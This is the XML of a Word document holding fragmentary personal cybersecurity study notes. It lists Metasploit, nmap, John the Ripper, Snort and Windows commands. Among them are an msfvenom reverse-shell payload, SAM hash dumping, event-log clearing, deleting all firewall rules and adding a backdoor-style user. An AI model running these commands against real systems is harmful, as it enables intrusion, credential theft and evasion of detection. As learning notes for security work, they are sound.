      <w:r w:rsidR="00FF3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ow payloads – show which payload we can choose</w:t>
      </w:r>
      <w:r w:rsidR="00FF3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payload … - choose the payload</w:t>
      </w:r>
      <w:r w:rsidR="0009466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et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0009466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ost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0009466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define the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0009466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09466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ttac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run/exploit – run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pt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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un -j – run as job in the background, like when opening a port and waiting for the target to talk to us</w:t>
      </w:r>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jobs – show all the jobs in the background</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 save the session in the background so we can do other things as attack other hosts</w:t>
      </w:r>
      <w:r w:rsidR="002010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new sessions </w:t>
      </w:r>
      <w:r w:rsidR="002010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grade the current sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D5E7" w14:textId="11CAF6EE" w:rsidR="003D3CFF" w:rsidRDefault="00460961"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shell t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pos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or upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="00E127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ssions -u 2 – try to upgrade session 2</w:t>
      </w:r>
      <w:r w:rsidR="002D71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earch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D71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l_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D71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 is post exploitation, for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="0004290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suggester – suggest us what to use for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="005C2B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E11E3E6" w14:textId="29BBC62F" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B"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ulti/handler – listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD19E71" w14:textId="6E1DD5D2" w:rsidR="00A74E5E" w:rsidRDefault="00A74E5E"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r w:rsidR="00815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815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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00815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user 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id</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current proces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ntifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellEnd"/>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st of the processes</w:t>
      </w:r>
      <w:r w:rsidR="003B1C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3B1C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info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B1C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data on the system such as hostname</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ell – we can use that to get a shell</w:t>
      </w:r>
      <w:r w:rsidR="002A6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2A6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dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A6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ashes of the passwords of the users</w:t>
      </w:r>
      <w:r w:rsidR="005033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igrate -N svchost.exe – migrate to another process by its name to get privileged </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ev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ear the events log</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ecute – execute a command</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boot – reboot the computer</w:t>
      </w:r>
      <w:r w:rsidR="00AB08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B08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rep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB08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string as grep command</w:t>
      </w:r>
      <w:r w:rsidR="002656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earch -f accounts.txt – find a path to this file (similar to find command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002656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r w:rsidR="002656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15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g save HKLM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA15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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA15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sam.hiv – save the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA15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hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA15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computer than you can download it from there</w:t>
      </w:r>
      <w:r w:rsidR="00930A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30A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ownload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00930A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hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00930A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ownload this file to our machine</w:t>
      </w:r>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samdump2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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_win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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files </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ownloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C3AF" w14:textId="2F969620" w:rsidR="00614931" w:rsidRDefault="006C63AB"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venom</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payloads | grep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ive a list of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load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proofErr w:type="spellStart"/>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venom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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78 -f exe &gt;&gt; file.exe – create payload and name it exe</w:t>
      </w:r>
      <w:r w:rsidR="00CD1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reverse payload so we need the target to turn this file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AFB0E" w14:textId="05F76AAC" w:rsidR="00E34555" w:rsidRDefault="00E34555"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db</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eat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gresq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 shows all the workspaces that exi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a hello – add new workspace called hell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default – switch to the default workspace called defaul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sts -c address – the flag -c behave as awk and find the address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rvices -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ftpd</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have as grep and search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ftpd</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F32E7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_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F32E7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p 21 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F32E7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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F32E7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ve the results to the DB of </w:t>
      </w:r>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sploit</w:t>
      </w:r>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_export</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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h/file.xml – export the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96E133" w14:textId="3E188790" w:rsidR="00FF42A0" w:rsidRDefault="00FF42A0"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uxiliary/admin/</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17_010_command – auxiliary for exploi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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="225E4C7B" w14:textId="567EA552" w:rsidR="005C2B40" w:rsidRDefault="000D61EA"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ommand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shel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FirewallProfil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hen we want to ru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shel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we need first to writ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shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27A46724" w14:textId="77777777" w:rsidR="0096541F" w:rsidRDefault="0096541F"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0BA6B" w14:textId="5A6F6A8A" w:rsidR="005C2B40" w:rsidRPr="000C387E" w:rsidRDefault="005C2B40" w:rsidP="005C2B40">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63771259" w14:textId="44A2A3F7" w:rsidR="005C2B40" w:rsidRPr="004456B5" w:rsidRDefault="002C1548"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h</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twork shel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E119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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E119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E119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firewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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show rule name=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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MP_allow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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s data on the predefined rule called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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MP_allow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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delete rule name=all – delete all the rules</w:t>
      </w:r>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h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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add rule name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ction=allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10 – allow incoming traffic from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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add rule name=accept_443 protocol=TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 action=allow – enable communication outside in port 80 in TCP protocol </w:t>
      </w:r>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h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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firewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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set rule name=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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_ICMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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new action=block protocol=ICMPv4 – change exist rule (set command) to block ping</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B6F8194" w14:textId="77777777" w:rsidR="001A6FC4" w:rsidRDefault="001A6FC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C953D"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E2328"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0BFE4"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D627D"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61105" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00892789"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248F1" w14:textId="77777777" w:rsidR="00502E69" w:rsidRPr="00502E69" w:rsidRDefault="00502E69"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DF0B0" w14:textId="2137E2C5" w:rsidR="000C387E" w:rsidRPr="000C387E" w:rsidRDefault="000C387E" w:rsidP="000C387E">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map</w:t>
      </w:r>
      <w:r w:rsidR="00D8498F">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D8498F">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can</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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0208A4CE" w14:textId="189C453A" w:rsidR="00132564" w:rsidRPr="00132564" w:rsidRDefault="00296C76" w:rsidP="00BF783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 scans the default 1000 ports on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oes not use ping before scanning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ssumes the destination exist, sometimes there are destinations that block ping, and the default for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at when it does not find the host is active It won’t search for open ports so we want to us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p- - scans all the ports (</w:t>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53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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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F – scan the default 100 ports</w:t>
      </w:r>
      <w:r w:rsidR="00C00D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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C00D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00C00D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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C00D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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C00D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can service versions</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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if the host is 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proofErr w:type="spellStart"/>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3389 – scan onl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proofErr w:type="spellStart"/>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3389,22,53 – scan few por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350B"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="0074350B"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0074350B"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r w:rsidR="007435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20 - 100 – scan range of ports</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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24 – scan all the subnet</w:t>
      </w:r>
      <w:r w:rsidR="007435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3BEF"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E3BEF"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008E3BEF"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r w:rsidR="008E3BE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open – shows in the output only open ports</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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s.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ust to come with -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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roofErr w:type="spellEnd"/>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ave the versions of the machine it scan, the script check the version of the services of the machine, and check if there is already known vulnerability by checking in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ript</w:t>
      </w:r>
      <w:r w:rsidR="00F806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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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if anonymous is user in the target (in ftp)</w:t>
      </w:r>
      <w:r w:rsidR="009E75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E75D5"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ftp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E75D5"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e.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E75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y connect to ftp using common and simple credentials</w:t>
      </w:r>
      <w:r w:rsidR="003933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ript=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003933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proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003933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3933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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="003933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covery – exploit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003933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proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003933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 to try to get data as hostname, operating system, domain name and more.</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default</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horthand of </w:t>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default</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tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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un a default set of basic scripts of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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get info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8D174" w14:textId="0E698B10" w:rsidR="003D0295" w:rsidRDefault="003E0EA2" w:rsidP="0013256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p 80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disable-</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packet-trace -D RND: 5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 syn packet without completing the 3-way handshak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 skip the host resolution which make the scanning fast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e-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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abl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g discover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et-trac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 all the packets sent and receive during the scann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RND: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ing 5 decoys of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arden on the target to scan the real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ing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2DB64" w14:textId="4B6B9ED3" w:rsidR="00021236" w:rsidRDefault="0062373E" w:rsidP="003E0EA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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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3 – between 0-5 speed of scanning, when 5 you may lose packets and you are not stealth, and T0 is slow and more stealth.</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roofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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utput greppable</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roofErr w:type="spellStart"/>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spellEnd"/>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utput normal</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roofErr w:type="spellStart"/>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X</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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utput XML (the only output provide the most info)</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373A"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E373A"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008E373A"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roofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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file.txt</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ve in greppable format to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0ACCFB" w14:textId="01C2EE41" w:rsidR="00021236" w:rsidRDefault="006B420E"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scan the ports by its order and not random</w:t>
      </w:r>
      <w:r w:rsidR="003643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 – find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003643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roofErr w:type="spellEnd"/>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 – specify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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standard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 – for file of</w:t>
      </w:r>
      <w:r w:rsidR="000550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of</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ttack</w:t>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 – specify to stop attack after found right credentials</w:t>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 4 – specify the amount of attacks parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DC988" w14:textId="06D25D07" w:rsidR="00D8498F" w:rsidRPr="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="00D8498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imeout 30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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roofErr w:type="spellEnd"/>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 | grep open | awk '{for (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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roofErr w:type="spellStart"/>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NF; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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 $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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t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mit the scan for 30 seconds, show only from column 4 to the last column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35501F3E" w14:textId="20E73325" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="006234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out 30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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can</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 U:1-100</w:t>
      </w:r>
      <w:r w:rsidR="00B102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mit the time of the scan to 30 seconds, and scan all the port between 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA273F5" w14:textId="77777777" w:rsidR="00D8498F" w:rsidRDefault="00D8498F"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E678E" w14:textId="77777777" w:rsidR="00E204D2" w:rsidRDefault="00E204D2"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944FA" w14:textId="7DD1C3D6" w:rsidR="00723AB1" w:rsidRPr="000C387E" w:rsidRDefault="00723AB1" w:rsidP="00723AB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51E60F64" w14:textId="725B8A7A" w:rsidR="00723AB1" w:rsidRDefault="00723AB1"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 4 7 1234hd &gt;&gt; file.txt – minimum 4 chars, maximum 7 chars, the possible chars are 1234hd, save all the options of passwords to file.tx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small lett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big lett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numb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symbols</w:t>
      </w:r>
      <w:r w:rsidR="000164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runch 7 7 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000164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or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000164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gt; symbol.txt – the flag -t has to come when using char that replace group of characters as ^, the file will contain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000164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or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000164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ant) word then more 3 symbols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52C8E3" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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FB1D9" w14:textId="77777777"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9E26A" w14:textId="481114FA" w:rsidR="0044046E" w:rsidRPr="000C387E" w:rsidRDefault="0044046E" w:rsidP="0044046E">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The Ripper</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7213275C" w14:textId="22B6156D"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joh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ow – try to crack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dow file while using it default list of passwords called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ls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will success only if the word very comm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ow --wordlist = ./new_list.txt – use the list of passwords to crack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dow --wordlist = ./new_list.txt --format  </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pt – use the list of passwords to crack the file and use the format we wrote</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ow --format  = crypt --show – it will show the password we already cracked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B283D60" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="00FC205C"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r2joh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me.ra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gt; hash.txt – save the hash of the password of the file, the same for files like zip2john, pdf2john, 7z2john, then all left is to crack it with john or other tools.</w:t>
      </w:r>
      <w:r w:rsidR="00AD3C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tlocker2john -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD3C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AD3C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D3C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ed.vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD3C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hash.txt - extract hash of password of memory file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CD9F9"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0E090"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F8B1C"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A026F"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ABAD1"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65640"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7D62E"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E4EBB"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7F139"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D8433" w14:textId="28DCC5D9" w:rsidR="009F3651" w:rsidRPr="000C387E" w:rsidRDefault="009F3651" w:rsidP="009F365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nort</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48C5645A" w14:textId="5AF120DF"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S/IPS snort – it’s a tool for creating rules to pop up an alert when something </w:t>
      </w:r>
      <w:r w:rsidRPr="009F36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ppens</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1B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part of cisco, it</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many types of fields as:</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sg – the message will pop up</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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nort ID, the id of the rule</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ffset – from each byte start to check</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pth –  how many bytes to investigate</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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ent – which string to search</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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v – which version of the rule (we need to change manually the number when we change the rule so we could track on it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC5523" w14:textId="77777777" w:rsidR="00110024" w:rsidRDefault="00EA275D"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rt ICMP 10.10.10.10 any -&gt; an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g: “ICMP attempt attack”; sid:1000005) – alert us if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from any port exist will talk to an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very port i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m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w:t>
      </w:r>
      <w:r w:rsidR="001100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ill pop the message “ICMP attempt attack”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782CE49" w14:textId="3EF7FBB3" w:rsidR="00EF4C60" w:rsidRPr="009C77E4" w:rsidRDefault="00110024" w:rsidP="009C77E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rt TCP 10.10.10.10/24 any -&gt; an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HTT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set:4; depth:40;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g:”HTT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ed”;) – if there i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 between ever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10.10.10.10/24 in every port to an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ny port, it will check between 5-44 bytes and search for HTTP string, if found I will pop the message  “HTTP matched”</w:t>
      </w:r>
      <w:r w:rsidR="009F36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BF3FF4F" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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A8515" w14:textId="77777777" w:rsidR="00883A17" w:rsidRPr="00294C81" w:rsidRDefault="00883A17" w:rsidP="00883A17">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA14B4" w14:textId="436F8278" w:rsidR="008C066C" w:rsidRDefault="00480370" w:rsidP="0048037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8.8.8.8 – check the connection (may not respond even where there is a connection if the destination block the ICMP protoco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ing -a 8.8.8.8 – check the connection and resolve to host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883A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list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00883A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s processes that running on the machin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8C06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kill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C06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shows all the options of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C06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kill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C06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like -h in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C06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p>
    <w:p w14:paraId="02BD2D0C" w14:textId="77777777" w:rsidR="00883A17" w:rsidRDefault="00883A17" w:rsidP="00883A1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ear th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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EF66F90" w14:textId="0589AED8" w:rsidR="003000B5" w:rsidRDefault="00883A17" w:rsidP="00E4246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 shows a list of users</w:t>
      </w:r>
      <w:r w:rsidR="00C567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 user administrator – show info the user administrator as local group and last logon and more</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0B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soc 123 /add – add new user called soc with the password 123</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2462"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E42462"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Junkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E42462"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the user</w:t>
      </w:r>
      <w:r w:rsid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25D14" w:rsidRP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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00425D14"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Junkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00425D14"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 -change password of user</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proofErr w:type="spellStart"/>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Junkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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yes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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able user</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proofErr w:type="spellStart"/>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Junkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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able user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14186B5D" w14:textId="77777777"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or a word like grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AC6B5" w14:textId="77777777"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 print the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD5EF8" w14:textId="31C19A23"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config – display network config</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on</w:t>
      </w:r>
      <w:r w:rsidR="00F356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w:t>
      </w:r>
      <w:r w:rsidR="00F356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dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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lver cache, all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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es the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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lved and saved it for better search in the next time</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pconfig /release – return you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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you will lost connection)</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pconfig /renew </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for new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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8.8.8 – show all the path in the way to get to this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE23C0B" w14:textId="2E2638E1" w:rsidR="003000B5" w:rsidRDefault="00E96AF9" w:rsidP="003000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d – show current path, lik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d</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d .. – go back one directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B61E0" w14:textId="68592A7D" w:rsidR="003715FF"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w:t>
      </w:r>
      <w:r w:rsidR="003715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and directories, like ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4120C" w14:textId="77777777" w:rsidR="0043317B" w:rsidRDefault="003715FF" w:rsidP="003715F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 enter a file, like cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF829B" w14:textId="75AF6B1D" w:rsidR="00804B18" w:rsidRDefault="00804B18" w:rsidP="00804B1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ta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a – know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tells netstat to display all connections and listening ports. It includes both TCP and UDP ports, regardless of their sta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option instructs netstat to display addresses and port numbers in numerical form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default, netstat attempts to determine and display th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of the remote addre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adds the Process ID (PID) associated with each connection to the output. This is crucial for identifying which processes on your system are creating which connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C950AD" w14:textId="59672F0E" w:rsidR="00CC4C4B" w:rsidRDefault="00CC4C4B" w:rsidP="00804B1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lis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s all the tasks/processes and their P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kil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D 5072 – stop the process PID 5072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B16A" w14:textId="77777777" w:rsidR="00C4612C" w:rsidRDefault="00FF725F"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b pic.jpg+sec.zip pic1.jpg – hide the file using A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 for see files that hidden in A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epad vac7.jpg:secret.txt – open the text hidden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pain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c7.jpg:pic.jpg – open the </w:t>
      </w:r>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hidden file</w:t>
      </w:r>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fox.ink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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DS\vac7.jpg:bomb.pdf – open the pdf hidden file</w:t>
      </w:r>
      <w:r w:rsidR="008A7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ype vac2.jpeg &gt; vac1.jpeg:vac2.jpeg – hide the file vac2.jpeg behind vac1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F849334" w14:textId="77777777" w:rsidR="000E1FB5" w:rsidRDefault="00C4612C"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tdump.exe $MFT /o mf.txt – convert the $MFT to text file (need the mftdump.exe file for that) than you can drag the text file to the excel and see the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363FF3A" w14:textId="7FB52F69" w:rsidR="00296C76" w:rsidRDefault="00883A17"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27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3D753D3" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB"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33307" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB"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B7AD9"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1575C"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394D1"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8BFAB"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ADF61"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0B36D"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D9BE9"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44ACA" w14:textId="77777777" w:rsidR="005E279D" w:rsidRDefault="005E279D"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C1B16" w14:textId="4FEC0C90" w:rsidR="00C97ECA" w:rsidRPr="00C97ECA" w:rsidRDefault="00C97ECA" w:rsidP="00C97EC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reshark filter syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C4D3A" w14:textId="7389AB10" w:rsidR="002D2B47" w:rsidRDefault="005E279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10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="00D27AC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D27AC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dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27AC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10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="009E3A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9E3A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ddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E3A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10.10.10 – search for packets with this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E3A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9E3A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in source or destina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sr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C address)</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packets with this source MAC address</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dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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C address) – search packets with this destination MAC address</w:t>
      </w:r>
      <w:r w:rsidR="006628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6628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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006628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8:8A… - search for packets that with this MAC address in source or destination</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ns.qry.name == “xxx.com” – search for domain name</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p.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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355 – scan for specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:r w:rsidR="008A57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8A57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port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A57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45 – scan for specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A57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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A57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w:t>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version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 – search for only ipv4 packets</w:t>
      </w:r>
      <w:r w:rsidR="003718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3718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version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003718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6 – search for only ipv6 packets</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rame contains “login” – search for packets that contain the wor</w:t>
      </w:r>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request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10 – filter for all the packets with get that specific </w:t>
      </w:r>
